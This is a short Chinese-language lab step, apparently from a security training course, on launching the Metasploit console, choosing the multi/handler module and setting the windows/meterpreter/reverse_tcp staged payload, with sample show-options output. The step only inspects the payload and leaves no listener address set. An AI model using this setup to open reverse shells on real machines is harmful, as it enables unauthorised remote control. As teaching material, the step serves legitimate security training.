选择一个 exploit 和 staged payload,例如 windows/meterpreter/reverse_tcp
在此步骤中,你将启动 Metasploit Framework 控制台并选择一个通用的 exploit handler。然后,你将配置它使用一个常见的 staged payload。我们使用 exploit/multi/handler 模块,因为它是一个通用的监听器,非常适合演示 payload,而无需特定的易受攻击目标。
首先,打开你的终端并启动 Metasploit 控制台。我们将使用 -q(quiet,安静)标志来跳过启动横幅。
msfconsole -q
看到 Metasploit 提示符 (msf6 >) 后,你需要选择 exploit handler。
use exploit/multi/handler
接下来,让我们设置 payload。staged payload 的名称通常格式为 platform/stage/stager。例如,windows/meterpreter/reverse_tcp 表示平台是 Windows,最终 payload(stage)是 Meterpreter,而初始连接方法(stager)是反向 TCP shell。
使用以下命令设置 staged payload:
set payload windows/meterpreter/reverse_tcp
你将看到一条确认消息 payload => windows/meterpreter/reverse_tcp。为了确保无误,你可以查看当前配置。
show options
你将在选项中看到列出的 payload。我们不需要设置 LHOST 或 LPORT,因为我们实际上并没有运行 exploit;我们只是在检查 payload 的属性。
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target